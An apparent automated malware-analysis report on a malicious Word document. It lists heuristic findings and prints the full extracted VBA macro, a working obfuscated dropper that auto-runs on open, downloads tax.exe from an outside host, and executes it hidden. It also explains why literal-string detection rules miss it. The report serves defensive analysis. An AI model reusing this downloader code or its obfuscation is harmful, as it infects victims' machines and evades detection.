Verdict: MALICIOUS (risk score 190)

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File
The sample is a malicious Word document (OLE) carrying a VBA macro. Execution starts at Sub AutoOpen(), which only calls farozja. That routine rebuilds every sensitive string from fragments: the ProgID passed to CreateObject is assembled from six short literals into MSScriptControl.ScriptControl, the .Language property is set to "JScr" & "ipt" (JScript), and the payload passed to .AddCode is pieced together from dozens of Array(...)(n) expressions in which each array holds one useful fragment surrounded by decoy entries. The decoded JScript defines a single function, lol (the value later passed to .Run), that uses ActiveXObject to create WScript.Shell, Scripting.FileSystemObject, ADODB.Stream and Microsoft.XMLHTTP, issues a synchronous GET for an executable (the URL is likewise reassembled at runtime and decodes to hxxp://jbrianwashman[.]com/download/files/tax.exe), writes the response body to a random file name in the user's temp folder (fso.GetSpecialFolder(2) + "\" + fso.GetTempName()), and launches it with "cmd.exe /c " + path through shell.run(..., 0), i.e. with a hidden window. Note that the VBA itself never instantiates WScript.Shell or an XMLHTTP object; its only CreateObject call is for the script control, so CreateObject rules that look for those ProgIDs as literals in VBA source would miss this sample. The OLE_VBA_PCODE_AUTOEXEC_EXEC heuristic corroborates the extracted source rather than adding a separate finding: the compiled stream contains the same auto-exec and execution tokens that the recovered AutoOpen/CreateObject/AddCode/Run code shows, so there is no sign that the p-code diverges from the source.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-1836869 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Dropper.Agent-1836869.

- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.

- CreateObject call (high, OLE_VBA_CREATEOBJ). Matched lines in script:
    ywybc = yssiki & ezpuz & uwyv6 & gosy & omic & abzaxkutz
    Set awanwywaht = CreateObject(ywybc)
    awanwywaht.Language = kusik
  The ProgID never appears as a literal; concatenating the fragments gives MSScriptControl.ScriptControl, and kusik decodes to JScript.

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. Here the source was recovered as well and contains the same AutoOpen entry point and CreateObject/AddCode/Run calls, so the compiled stream and the decompressed source agree.

- AutoOpen macro (low, OLE_VBA_AUTOOPEN). Matched lines in script:
    End Sub
    Sub AutoOpen()
    farozja

- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC). OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that this description conflicts with the artifact table below, where a VBA project (macros.bas) was in fact recovered; read this finding together with OLE_VBA_AUTOOPEN rather than as evidence of a separate, WordBasic-only macro.

- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
  This is the DrawingML namespace URI that drawing-bearing Office files carry, not a network indicator. The macro's real download URL is not listed because it never exists as a contiguous string in the file: it is assembled at runtime from the Array() fragments in the macro.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9522 bytes | 550c1fa133a04b633e4418f50394e1044ca6f185c593ce225122036d47239dd3 |
Preview of the extracted script (first 1,000 lines)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub farozja()
Dim ohxax, yssiki, ywybc, uwyv6, kusik, hebuda, omic, ezpuz, pzedsoso, gosy, utuc5
omic = "ptCon"
pzedsoso = "JScr"
ohxax = "ipt"
hebuda = "lol"
abzaxkutz = "trol"
uwyv6 = "ntrol"
gosy = ".Scri"
yssiki = "MSScr"
ezpuz = "iptCo"
yxefcoko6 = Array("890", "729", "re3", "jla1", "func", "acqa9", "qujf7")(4) & Array("752", "or8", "snur6", "566", "tion", "567")(4) & Array("553", "838", "pagm3", "sre4", "agi2", "726", "zi7", " lol", "uss0")(7) & Array("ko1", "807", "887", " () ", "627", "vonc0", "pwenr7", "ybg5")(3) & Array("719", "543", "{var", "799")(2) & Array("snevh1", "fqaw6", "673", "kokm7", "496", "780", "896", "axqy6", " she")(8) & Array("ll =", "557", "882", "529", "xa9", "am0", "ubj8", "kfy4")(0) & Array("430", "595", "853", "561", " new", "ix7")(4) & Array("va2", "utn2", "mqer6", " Act", "xdac5")(3)
yzykliw = Array("iveX", "agva5", "otu6", "569", "500", "yja5", "469", "471", "zve6")(0) & Array("744", "876", "730", "Obje", "740", "co3", "456")(3) & Array("801", "ct (", "mka1", "ogw3", "ogu8", "fab6", "yfve4")(1) & Array("amv0", "lop7", "718", "900", "587", """WSc")(5) & Array("yko4", "ript", "efwa9", "681", "689", "468", "794", "415", "808")(1) & Array("755", "xe9", "ezmo1", ".She", "445", "urs1", "747", "iho1", "na0")(3) & Array("hvytp7", "itt0", "560", "ll"")", "744", "futl4")(3) & Array(";var", "oq3", "por6", "816", "514", "zju4")(0) & Array("603", " fso", "656", "594", "586", "799", "737", "716")(1)
kerale5 = Array(" = n", "530", "ubru4", "438", "705", "pix7", "ifl9", "554")(0) & Array("475", "fyt5", "dtitm2", "469", "686", "ew A")(5) & Array("qro5", "784", "625", "ctiv")(3) & Array("550", "858", "497", "548", "zybs6", "ac6", "eXOb")(6) & Array("719", "845", "731", "878", "ject")(4) & Array("604", "473", " (""S", "udo8")(2) & Array("crip", "801", "543", "589", "626", "636", "428")(0) & Array("523", "563", "ting", "opi4")(2) & Array("591", "aqn9", "675", "604", "ogx3", "be6", "ge3", ".Fil")(7)
zbewis3 = Array("mdip5", "qqa6", "ve0", "egf8", "495", "eSys")(5) & Array("temO", "za8", "udu1", "709", "604")(0) & Array("bjyn0", "vtol0", "731", "888", "zeqb5", "bjec", "426")(5) & Array("578", "451", "t"");", "469", "nju7", "lhyl9", "619", "645")(2) & Array("wuw8", "var ", "658", "705", "875", "ny3")(1) & Array("873", "ehze5", "tmp_", "vge0", "irv1", "ub6", "tta3", "ilq0", "459")(2) & Array("ypy1", "llug8", "path", "826")(2) & Array("870", "837", "560", "wko1", "ywy9", "711", " = f", "663", "686")(6) & Array("707", "577", "so.G", "564", "oj0", "ezs6")(2)
bnavi = Array("xe9", "678", "711", "kkerg3", "520", "etSp", "ecy4", "xomc4", "894")(5) & Array("774", "881", "624", "700", "yxy0", "ecia")(5) & Array("ovf8", "682", "lFol", "jut2", "587")(2) & Array("umbe1", "564", "der(", "ykni0", "679", "842", "ab3", "807", "byd2")(2) & Array("497", "rwosf0", "yrr4", "dzu3", " 2) ")(4) & Array("ih1", "ucne5", "834", "+ ""\", "423")(3) & Array("806", "615", "bme3", "ke0", "\"" +")(4) & Array("689", " fso", "tapj4", "766")(1) & Array("ar0", ".Get", "pa2", "vu8", "ave9")(1)
ipunducu = Array("493", "hmy2", "Temp", "ym7")(2) & Array("ta4", "onv9", "Name", "akk6", "fems0", "416", "iqd6")(2) & Array("405", "854", "602", "();v")(3) & Array("420", "656", "ar s", "579", "vesp0")(2) & Array("jhu8", "trea", "826", "624", "491")(1) & Array("jufx4", "axko6", "ifo6", "m = ", "aqby0", "ube7")(3) & Array("new ", "do6", "hej4", "ogla0")(0) & Array("Acti", "639", "525", "675", "xhe6", "vgers7", "xsa4", "gy0")(0) & Array("413", "843", "irf2", "814", "698", "zyh5", "veXO", "665")(6)
hhamxe = Array("483", "wxe3", "bjec", "836", "743", "535")(2) & Array("akba9", "675", "850", "zi0", "ita8", "813", "vew3", "t (""")(7) & Array("uxwy3", "ADOD", "did1", "885", "tvedn0")(1) & Array("B.St", "737", "lno3", "vsamz3", "781", "671", "506", "596", "461")(0) & Array("731", "826", "866", "582", "otq6", "ream", "703")(5) & Array("412", "796", "481", "607", """);s", "777", "569", "741", "641")(4) & Array("zno6", "835", "433", "695", "trea", "647", "565")(4) & Array("asu5", "554", "431", "m.Op", "gnel5", "812", "662")(3) & Array("ojqe0", "727", "en()", "706", "ix7")(2)
otuxe5 = Array("512", ";str", "ukf8", "493", "524", "oc9", "ema9", "548")(1) & Array("gxy0", "416", "655", "ta0", "eam.", "yra0", "hca0", "896", "ytl3")(4) & Array("774", "sqipl1", "873", "602", "Type", "606", "ac0", "640")(4) & Array("556", "681", "431", " = 1", "839")(3) & Array("ufh0", "735", "lzu4", "875", "637", "730", ";str", "597")(6) & Array("614", "874", "eam.", "na3", "ywjo6", "mvo5", "563", "li4")(2) & Array("odm5", "ocdi6", "ab6", "Posi", "425")(3) & Array("526", "564", "tion", "624")(2) & Array("fxa7", "548", "722", " = 0", "526", "bvy1", "541", "808", "ovy0")(3)
abesuho7 = Array("; va", "680", "sde5", "odra4", "863", "818")(0) & Array("413", "453", "r as", "670", "895")(2) & Array("kli2", "s = ", "rbe7", "vo1", "733")(1) & Array("yky4", "by0", "gys0", "552", "672", "upu8", "new ")(6) & Array("761", "vrup9", "em6", "li8", "468", "rvot4", "Acti", "710", "duqj3")(6) & Array("lux8", "veXO", "677", "435", "836")(1) & Array("ov8", "aqmu3", "468", "wwe3", "udh4", "bjec", "os9", "711", "upo1")(5) & Array("t(""M", "esm8", "aje9", "420")(0) & Array("al7", "mwavv2", "pfy9", "572", "omra9", "icro", "717", "491")(5)
arpadhums1 = Array("644", "ytu0", "880", "cu3", "tolc9", "soft")(5) & Array("qqa4", "478", "yj0", "694", "yzpa0", "854", "550", ".XML")(7) & Array("808", "499", "778", "HTTP", "857")(3) & Array("pji4", """);a", "of7", "444")(1) & Array("633", "jpi2", "awu8", "481", "803", "420", "ss.o", "ni0")(6) & Array("hjeb0", "igt0", "uti8", "834", "bno3", "rjas0", "660", "pen(")(7) & Array("""GET", "571", "eka0", "812")(0) & Array("506", "bqy0", "ace3", "888", """, """, "agf3", "831", "ubj6")(4) & Array("pbu8", "http", "480", "gna4", "uj5", "559", "jebw0")(1)
idihfe = Array("880", "582", "ly0", "ne0", "bba0", "://j", "405", "val3")(5) & Array("gis7", "698", "bria", "un7")(2) & Array("426", "674", "nwas", "qy9", "878")(2) & Array("857", "mew0", "xgy1", "uzu0", "hman", "726", "420")(4) & Array("757", "ech5", ".com", "ido0", "xkub2", "830", "ttu6", "ik8")(2) & Array("499", "543", "/dow", "em3", "803")(2) & Array("785", "856", "do8", "411", "nloa")(4) & Array("hmat0", "uf0", "d/fi", "665", "buw9", "643", "681")(2) & Array("778", "639", "429", "ylc9", "692", "les/")(5)
codfegj9 = Array("tax.", "442", "889", "899", "azz1", "kfa5", "447", "ru5")(0) & Array("tbasd9", "ipqy0", "zli7", "oj2", "571", "872", "exe""", "654", "aco0")(6) & Array("zca7", "593", ", 0)", "704")(2) & Array("qymt1", "ag8", ";ass", "516", "674", "650", "zdoz2")(2) & Array("idwa3", ".sen", "537", "uva8")(1) & Array("568", "je5", "oh8", "530", "590", "d();")(5) & Array("813", "615", "al4", "785", "stre", "698", "665")(4) & Array("acma1", "lec7", "am.W", "akv9")(2) & Array("418", "dky6", "447", "410", "anv5", "hih2", "549", "qgur8", "rite")(8)
vvawi4 = Array("urr4", "691", "pacl4", "exk2", "(ass", "bax7", "op4")(4) & Array("yvh9", ".Res", "818", "iz0", "430", "570", "rzi0")(1) & Array("kpyp7", "kut9", "vli8", "pons", "efa8", "gkud2", "tek1")(3) & Array("my3", "evb9", "787", "558", "eBod")(4) & Array("738", "898", "y);s", "afqy8")(2) & Array("hfi1", "545", "trea", "877", "693", "fvo7", "739", "576")(2) & Array("461", "m.Sa", "upwy7", "499", "zsiwf2")(1) & Array("lu3", "716", "veTo", "ecwu2", "rohm8", "iv7", "731")(2) & Array("706", "626", "tti5", "emu2", "igce9", "File", "826", "728", "711")(5)
bemderwufk = Array("458", "867", "(tmp", "vyjp0", "542", "762")(2) & Array("up5", "496", "_pat", "ahqo9")(2) & Array("qaxt6", "664", "avo6", "h);s", "ggi8", "588", "803", "847", "731")(3) & Array("agy6", "554", "860", "ymc4", "487", "trea", "jci2", "ca2", "bof8")(5) & Array("m.Cl", "486", "ejce4", "odu6")(0) & Array("891", "le3", "avi0", "628", "ose(", "668")(4) & Array("uta0", "ehs0", "am9", ");va")(3) & Array("fma9", "ihi2", "731", "r cm", "uqe1", "755", "ywma3", "dkot9")(3) & Array("li7", "op5", "614", "drun", "fsa3", "780", "jedt1", "we2")(3)
oxninpozq = Array("823", "rez4", "745", "756", " = """, "701")(4) & Array("goc9", "jgi0", "484", "cmd.")(3) & Array("712", "znogl8", "ygpe9", "ane7", "exe ")(4) & Array("520", "/c """, "514", "xzy7", "oha5")(1) & Array("479", "fbe5", " + t", "638")(2) & Array("mp_p", "mne0", "540", "tri8", "onn2", "777", "hisb1", "eb0")(0) & Array("403", "570", "895", "ath;", "808")(3) & Array("oq9", "sjop0", "666", " she", "813", "ajm4")(3) & Array("ll.r", "423", "822", "870", "ego0", "509", "662", "ors1")(0)
hwecuxidw9 = Array("unqy5", "un(c", "764", "aco5", "426", "631", "800", "431", "utx5")(1) & Array("691", "yk0", "632", "mdru", "bcadc3", "455", "408")(3) & Array("n, 0", "oka4", "437", "efw5", "865", "427", "687", "565", "ow1")(0) & Array("554", "697", "yqra5", "577", ");}", "728", "627", "809", "atzo7")(4)
utuc5 = hebuda
kusik = pzedsoso & ohxax
ywybc = yssiki & ezpuz & uwyv6 & gosy & omic & abzaxkutz
Set awanwywaht = CreateObject(ywybc)
awanwywaht.Language = kusik
awanwywaht.AddCode (yxefcoko6 & yzykliw & kerale5 & zbewis3 & bnavi & ipunducu & hhamxe & otuxe5 & abesuho7 & arpadhums1 & idihfe & codfegj9 & vvawi4 & bemderwufk & oxninpozq & hwecuxidw9)
awanwywaht.Run (utuc5)
End Sub
Sub AutoOpen()
farozja
End Sub